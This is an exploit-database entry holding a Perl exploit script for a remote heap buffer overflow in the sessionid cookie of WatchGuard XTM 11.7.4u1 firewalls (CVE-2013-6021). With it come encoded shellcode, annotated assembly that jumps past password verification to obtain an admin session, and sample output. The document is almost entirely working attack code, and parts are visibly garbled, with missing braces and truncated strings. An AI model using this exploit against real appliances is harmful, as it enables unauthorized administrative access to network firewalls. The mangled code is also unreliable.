WatchGuard Firewall XTM 11.7.4u1 Buffer Overflow Perl Exploit

EKU-ID: 3599 CVE: 2013-6021 OSVDB-ID:
Author: Jerome Nokin Published: 2013-10-29 Verified: Verified



#!/usr/bin/perl -w
**  WatchGuard Firewall XTM version 11.7.4u1                       **
**  Remote buffer overflow exploit ~ sessionid cookie              **
**                                                                 **
**            Author:                      **
**              Blog:                        **
**               CVE:  CVE-2013-6021                               **
**                                                                 **
**                                                                 **
**  - Bug, exploit & shellcode details available on:               **
**                                 **
**                                                                 **
**  - Decoded shellocde can be found at the end of this file       **
**                                                                 **

=output sample

[*] Sending HTTP ping request to : OK. Got 'pong'
[*] Checking sessionid cookie for bad chars
[*] Checking shellcode for bad chars
[*] Heap messaging (request 1) : ...
[*] Sending authentication bypass shellcode (request 2)
[*] HTTP Response : 

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: sessionid=6B8B4567327B23C6643C98696633487300000014
Date: Sun, 27 Oct 2013 21:11:38 GMT
Server: none
Content-Length: 751

<?xml version="1.0"?>

[*] Over.

use warnings;
use strict;
use IO::Socket::SSL;

# host and port of the XTM web console
my $host = "";
my $port = "8080";

# Shellcode (watch out bad chars)
my $shellcode = 
	# shellcode: bypass password verification and return a session cookie
	"eXD4tKTyvgQeZNGIaOgtptC78kM7X8VXGK6fWxnmPGL0MkzTKoVegxmYneidKNKOkO" .
	"9WK5HxkNYoyoUPuP7pGpNkCpvlk9k5UPIoKO9oLKnmL4KNyoKOlKk5qx9nioioLKNu" .
	"RLKNioYoMY3ttdc4NipTq4VhMYTL14NazLxPERuP30oqzMn0G54OuPmkXtyOeUtHlK" .
	"sevhnkRrc8HGW47TeTwpuPEPgpNi4TwTMnNpZyuTgxKOn6K90ELPNkQU7xLKg0r4oy" .
	"ctQ45TlMK35EISKOYoMYWt14MnppMfUTWxYohVk3KpuWMY0Empkw0ENXwtgpuPC0lK" .
	"benpLKSpF0IWPDQ4Fh30s0Wp5PlMmCrMo3KO9olIpTUts4nic44dMnqnyPUTTHKOn6" .

# Shellocde max length
my $shellcode_max_len = 2000;

# set our shellcode address into EAX (expected by alpha2 encoder)
my $alpha2_ecx24 =
        "\x8b\x41\x24" .        # mov    eax, [ecx+0x24]
        "\x29\xd0" .            # sub    eax, edx ; (edx is updated by nopsled)
        "\x83\xc0\x40" .        # add    eax, 0x40
        "\x83\xe8\x35";		# sub    eax, 0x35
        # for the reader, "add eax, edx" contains bad chars. 
	# This is the reason why the nopsled decrement EDX and that we use "dec eax, edx"

# flush after every write
$| = 1;

# HTTP POST data for authentication request
my $login_post_data =
"<methodCall><methodName>login</methodName><params><param><value><struct><member>" .
"<name>password</name><value><string>foo</string></value></member><member>" .
"<name>user</name><value><string>admin</string></value></member></struct></value>" .

# list of bad characters
my @badchars = (
        "\x01", "\x02", "\x03", "\x04", "\x05", "\x06", "\x07", "\x08", "\x0a",
        "\x0b", "\x0c", "\x0d", "\x0e", "\x0f", "\x10", "\x11", "\x12", "\x13",
        "\x14", "\x15", "\x16", "\x17", "\x18", "\x19", "\x1a", "\x1b", "\x1c",
        "\x1d", "\x1e", "\x1f",
        "\x20", "\x22", "\x26", "\x27", "\x3b" # cookie delimiters

# function: Check input for badchars.
sub check_badchars {
	my $in = shift;
	my $stop = 0;
	for(my $i=0; $i<length($in); $i++){
		my $c = substr($in,$i,1);
		if($c ~~ @badchars){
			printf " - bad char '0x%02x' found\n", ord($c);
			$stop = 1;
	if($stop){ exit; }

# function: testing remote connectivity with the appliance
# send HTTP "ping" request and expect "pong" reply
sub testing_connectivity {

	print "[*] Sending HTTP ping request to https://$host:$port : ";
        my $sock = IO::Socket::SSL->new( PeerHost => "$host", PeerPort => "$port") or die "SSL: $!";

		my $req = 
			"GET /ping HTTP/1.0\r\n" .
			"Host:$host:$port"  . "\r\n" .

		# send ping
		print $sock $req;
		my $resp='';
		my $pong = 0;
		# read answer
		while (my $line = <$sock>){
			if($line =~ /pong/) { $pong = 1;}
			$resp .= $line;
		# got pong ?
			print "OK. Got 'pong'\n";
			print "ERROR. Expecting 'pong' response but received :\n";
			print $resp;
                close $sock;
                print "ERROR: Socket failed !\n";

# function: HTTP request used for HEAP messaging phase
sub building_request_step1 {
	my $sessionid = "A" x 120; # do not overflow now
        my $req =
                "POST /agent/ping HTTP/1.1\r\n" .
                "Host:$host:$port"  . "\r\n" .
                "User-Agent: " . "a" x 100 . "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0  " . "a" x 100  . "\r\n" .
                "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, " . "a" x 992 . "\r\n" .
                "Accept-Language: en-gb,en;q=0.5" . "a" x 200 . "\r\n" .
                "Cookie: sessionid=" . $sessionid . "\r\n" .
		"Accept-Charset: utf-8\r\n" .
		"Content-Type: application/xml\r\n" .
                "Content-Length: 3\r\n" .
                "\r\n" .
                "foo" ;
	return $req;

# function: HTTP request used for buffer overflow exploitation
sub building_request_step2 {

	my $sessionid = 
		"A" x 140 . 	# junk
		"\x44\x85" ;    # off by 2 overflow to reach  0x8068544	(on the heap).
				# 0x8068544 contains a "good memory chunk" which satisfy all rules

	print "[*] Checking sessionid cookie for bad chars\n";

        my $req =
                "POST /agent/ping HTTP/1.1\r\n" .
                "Host:$host:$port"  . "\r\n" .
                "User-Agent: " . "a" x 1879  . "\r\n" .
                "Connection: keep-alive"  . "a" x 22 . 
				"\x4a" x ($shellcode_max_len - length($shellcode) - length($alpha2_ecx24))  .	# nops
				$alpha2_ecx24 . # set EAX to shellcode addr
				$shellcode .	# shellcode
				"\r\n" .
		"Accept-Encoding: identity," . "b" x 1386 . "\r\n" .
                "Cookie: sessionid=" . $sessionid . "\r\n" .
		"Accept-Charset: utf-8\r\n" .
		"Content-Type: application/xml\r\n" .
                "Content-Length: " . length($login_post_data). "\r\n" .
                "\r\n" .
                $login_post_data ;

	return $req;

# function: Send an HTTP request.
sub send_http_request {

	my $req = shift;
	my $read_answer = shift || 0;
	my $http_resp='';

	# Open socket
	my $sock = IO::Socket::SSL->new( PeerHost => "$host", PeerPort => "$port") or die "SSL: $!";

                print $sock $req;

		# do we need the answer ?
		if ($read_answer){
			my $is_chunked = 0;
			my $is_body = 0;
	                while(my $line = <$sock>){

				if($line =~ /Transfer-Encoding: chunked/){
					$is_chunked = 1;
				if($line eq "\r\n"){ 
					# we reached the body 
						$line = <$sock>; # chunk length
						$line =~ s/\r\n//g;
						$sock->read(my $data, hex($line)); # read chunk
						$http_resp .= sprintf "Content-Length: %d\r\n\r\n", hex($line);
						$http_resp .= $data;
						close $sock ;
						return $http_resp;
				$http_resp .= $line;
                close $sock;
        	print "ERROR: Socket failed !\n";
	return $http_resp;

### MAIN ####

# print banner
print << 'EOF';
**  WatchGuard Firewall XTM version 11.7.4u1            **
**  Remote buffer overflow exploit ~ sessionid cookie   **
**                                                      **
**  Author:                     **
**    Blog:                       **
**     CVE:  CVE-2013-6021                              **
**                                                      **
**                                                      **
**  Bug, exploit & shellcode details available on:      **
**                        **
**                                                      **


# Send an HTTP ping request

# building HTTP requests
my $request_step1 = building_request_step1();
my $request_step2 = building_request_step2();

# Testing shellcode against bad cahrs
print "[*] Checking shellcode for bad chars\n";

# Fillin the heap
print "[*] Heap messaging (request 1) : ";
for(my $i=0 ; $i<3 ; $i++){
	print ".";
print "\n";

# Exploiting
print "[*] Sending authentication bypass shellcode (request 2)\n";
my $resp = send_http_request($request_step2,1);
print "[*] HTTP Response : \n\n";

print "-" x 80 . "\n";
print $resp;
print "-" x 80 . "\n\n";

print "[*] Over.\n";

; shellcode-get-gession.asm  
; by Jerome Nokin for XTM(v) 11.7.4 update 1

global _start

	; current EBP/ESP values
	; esp            0x3ff0b518    
	; ebp            0x3ff0b558    

	; first, fix the stack in HTTP_handle_request function
	; -------
	; esp           0x3ff0b6f0	
	; ebp           0x3ffffcb8	

	; we'll do
	;$ perl -e 'printf "%x\n", 0x3ff0b518 + 472'
	; 3ff0b6f0
	; ESP = ESP + 472
	;$ perl -e 'printf "%x\n", 0x3ff0b558 + 1001312'
	; 3ffffcb8
	; EBP = EBP + 1001312

	; fix ESP/EBP
	add 	esp, 472
	add 	ebp, 1001312

	; fixing overwritten ptrs

	; finding initial malloc pointer v50 (overwritten)
	; 0805f000-08081000 rwxp 00000000 00:00 0          [heap]

	; v54 and v55 have not been overwritten and contain *(v50+0x10) and *(v50+0x14)

	; example inside gdb
	;b *0x8051901
	;b *0x80519c0
	;(gdb) x/xw $ebp-0xf8		<===== v55
	;0x3ffffbc0:	0x08065b90
	;(gdb) x/xw $ebp-0xfc           <===== v54                            
	;0x3ffffbbc:	0x08067fe0
	;(gdb) find /w 0x08060000, 0x0806ffff, 0x08067fe0, 0x08065b90	<==== search seq on heap
	;1 pattern found.
	;(gdb) x/xw 0x8063b48-0x10	<==== initial malloc ptr (v50) is at 0x8063b48-0x10
	;0x8063b38:	0x00000001

	; search this sequence on the heap
	mov	eax, [ebp-0xfc]	; v54
	mov	ebx, [ebp-0xf8]	; v55

	mov	edi, 0x0805f000		; heap start addr
	add	edi, 4
	lea	esi, [edi+4]
	cmp     esi, 0x08081000		; edi is out of the heap ?
	je	loop_end
	cmp	[edi], eax		; cmp v54
	jne	loop
	cmp     [edi+4], ebx		; cmp v55
	je	found
	jmp	loop
	mov	eax, 0x08063b38		; default value (should not be reached)

	lea	eax, [edi-0x10]		; eax = v50 address (malloc ptr addr)
        ; EBP-0x10c 
        ; saved content of v50 (malloc) = ebp-0x10c 
        mov     [ebp-0x10c], eax

        ; reset EBX (see following)
        ; 805185c:       e8 95 43 00 00          call   8055bf6 <wga_signal+0x784>
        ; 8051861:       81 c3 93 c7 00 00       add    ebx,0xc793
        ; ....
        ; 8055bf6:       8b 1c 24                mov    ebx,DWORD PTR [esp]
        ; 8055bf9:       c3                      ret    
        mov     ebx, 0x805dff4

	; EBP-0x108
	; just reset it to 0
	mov     dword [ebp-0x108], 0x0
	; EBP-0x100
	;  80519b1:       8b 40 0c                mov    eax,DWORD PTR [eax+0xc]
	;  80519b4:       89 85 00 ff ff ff       mov    DWORD PTR [ebp-0x100],eax
	mov	eax, [eax+0xc]
	mov	[ebp-0x100], eax

	; simulate call to login function. copy args
	mov	ecx, [ebp-0x10c]
	mov	eax, [ebp-0x198]
	mov	edx, [ebp-0x194]
	mov	[esp+0x4],eax
	mov	[esp+0x8],edx
	mov	[esp],ecx

	; Now setup the login function stack

	; current esp/ebp
	; ----------------
        ; esp           0x3ff0b6f0      
        ; ebp           0x3ffffcb8 

	; we want to land into the login function
	; ---------------------------------------
	; esp            0x3ff0b420
	; ebp            0x3ff0b6e8

	; we'll do
	; $ perl -e ' printf "%x\n", 0x3ff0b6f0 - 720'
	; 3ff0b420
	; ESP = ESP - 720
	; $ perl -e ' printf "%x\n", 0x3ffffcb8 - 1000912'
	; 3ff0b6e8
	; EBP = EBP - 1000912

	; stack fix
	sub 	esp, 720
	sub 	ebp, 1000912

	; EBX -> .GOT (same as above btw)
	mov	ebx, 0x805dff4

        ; simulate "decode HTTP content" fct, at top of the login function
        mov     edx, [ebp+0x8]
        mov     edx, [edx+0x8]
        mov     dword [esp+0x4], 0x0            ; no content_encoding header
        mov     [esp], edx
        mov     esi, 0x0804d990
        call    esi                             ; decode content
        mov     [ebp-0x70],eax                  ; int decoded_content; // [sp+258h] [bp-70h]@1

	; simulate "search remote_address"
	mov	eax, [ebp+0x8]
	mov	eax, [eax+0x14]
	mov	[esp+0x4],eax
	lea	eax,[ebx-0x3ceb]
	mov	[esp],eax
	mov	esi, 0x804b670 			;FCGX_GetParam
	call	esi
	add	eax, 0x7			; remove '::ffff:'	====> to improve
	mov	[ebp-0x60],  eax

	; is_admin = 4
	mov	dword [ebp-0x48], 0x4

	; simulate "search req_user value"
	mov	eax, [ebp-0x70]
	mov    	eax, [eax+0x50]
	mov	dword [esp+0x8],0x0
	lea	edx,[ebx-0x3c93]
	mov	[esp+0x4],edx
	mov	[esp],eax	
	mov	esi, 0x804c07e
	call	esi				; <FCGX_PutStr@plt+0x3de>
	mov	[ebp-0x68],eax

	; v49 = 2 (ipv4)
	mov	word [ebp-0x5a], 0x2 		; unsigned __int16 v49; // [sp+26Eh] [bp-5Ah]@1

	; challenge
	mov	dword [ebp-0x6c], 0x0		; const char *req_challenge; // [sp+25Ch] [bp-6Ch]@1

	; set v43 to null
	mov	dword [ebp-0x74], 0x0 		;int v43; // [sp+254h] [bp-74h]@1

	; ok, we are ready to jump in the middle of the "login" function
	; right after the password verification

	; jump here
	; 804ee4b:       c7 44 24 04 00 12 00    mov    DWORD PTR [esp+0x4],0x1200
	; 804ee52:       00 
	; 804ee53:       c7 04 24 01 00 00 00    mov    DWORD PTR [esp],0x1
	; 804ee5a:       e8 11 c4 ff ff          call   804b270 <calloc@plt>

	mov	edi, 0x804ee4b
	jmp	edi